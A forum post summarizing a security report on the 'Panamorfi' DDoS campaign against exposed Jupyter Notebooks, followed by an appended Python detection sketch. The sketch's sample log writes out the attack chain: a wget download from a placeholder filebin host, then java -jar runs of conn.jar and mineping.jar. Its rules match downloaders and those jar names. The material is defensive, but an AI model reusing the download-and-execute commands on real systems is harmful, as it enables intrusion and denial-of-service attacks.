OP 18 August, 2024 - 07:57 PM
(This post was last modified: 18 August, 2024 - 10:47 PM by DragonCave.)
AquaSec experts have uncovered a new DDoS attack campaign dubbed "Panamorfi," which leverages the popular platforms Minecraft and Discord to execute its malicious activities. The campaign uses a Java-based package called "mineping.jar," originally developed for Minecraft servers, to carry out DDoS attacks such as TCP flood.
The attack sequence begins by exploiting open instances of Jupyter Notebook on the internet. Attackers execute wget commands to download a ZIP archive from the Filebin site. This archive contains two JAR files: "conn.jar" and "mineping.jar." The "conn.jar" file establishes connections to a Discord channel, from which it directly triggers the execution of the "mineping.jar" package.
According to Aqua researcher Assaf Morag, the purpose of these attacks is to overwhelm the target server's resources by sending a large number of TCP connection requests. The results of the attack are then displayed in a dedicated Discord channel, allowing the attackers to monitor their impact.
This malicious campaign is attributed to an attacker operating under the pseudonym "yawixooo," whose GitHub account contains a public repository with a Minecraft server configuration file.
This isn't the first time open instances of Jupyter Notebook have been targeted for attacks. In October 2023, Cado Security experts identified the Qubitstrike campaign, organized by a Tunisian group, which attempted to exploit Jupyter Notebook for illegal cryptocurrency mining and cloud environment hacking.
Researchers warn that attacks on Jupyter Notebook are becoming increasingly frequent and sophisticated. IT professionals must pay close attention to the configuration and security of these tools to prevent similar incidents in the future.
This is a bump
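An added detection sketch for the sequence described in the post (a download from Filebin launched by a Jupyter process, followed by execution of "conn.jar" or "mineping.jar"); it is not part of the original post or of the AquaSec report. The log format, host names, the placeholder URL and the inclusion of curl are assumptions made for illustration.

```python
import re
import shlex

# Constructed process-execution records: timestamp|host|parent process|command line.
# The format, hosts and URL are illustrative placeholders, not data from the report.
SAMPLE_LOG = """\
2024-08-01T10:00:01Z|nb-01|jupyter-notebook|wget https://filebin.example/PLACEHOLDER/files.zip
2024-08-01T10:00:05Z|nb-01|jupyter-notebook|unzip files.zip
2024-08-01T10:00:09Z|nb-01|bash|java -jar conn.jar
2024-08-01T10:00:12Z|nb-01|java|java -jar mineping.jar
2024-08-01T10:01:00Z|nb-02|jupyter-notebook|python train.py --epochs 3
2024-08-01T10:02:00Z|ci-07|bash|java -jar build/app.jar
"""

JAR_NAMES = {"conn.jar", "mineping.jar"}  # file names given in the post
DOWNLOADERS = {"wget", "curl"}            # the post names wget; curl is an added assumption

def classify(parent, cmdline):
    """Return the stage one record matches ("download", "jar_exec") or None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:            # unbalanced quotes: fall back to a plain split
        argv = cmdline.split()
    if not argv:
        return None
    exe = argv[0].rsplit("/", 1)[-1]
    if exe in DOWNLOADERS and "jupyter" in parent.lower():
        if any(re.search(r"https?://[^/]*filebin", a, re.I) for a in argv[1:]):
            return "download"
    if exe == "java" and "-jar" in argv:
        jar = argv[argv.index("-jar") + 1:][:1]   # argument after -jar, if present
        if jar and jar[0].rsplit("/", 1)[-1].lower() in JAR_NAMES:
            return "jar_exec"
    return None

def find_chains(log_text):
    """Return {host: stages} for hosts where a download is followed by a JAR run."""
    stages = {}
    for line in log_text.splitlines():
        parts = line.split("|", 3)
        if len(parts) != 4:
            continue              # skip malformed records
        _, host, parent, cmd = parts
        stage = classify(parent, cmd)
        if stage:
            stages.setdefault(host, []).append(stage)
    return {h: s for h, s in stages.items()
            if "download" in s and "jar_exec" in s[s.index("download"):]}
```

Requiring both stages on the same host keeps ordinary `java -jar` builds and normal notebook activity out of the results.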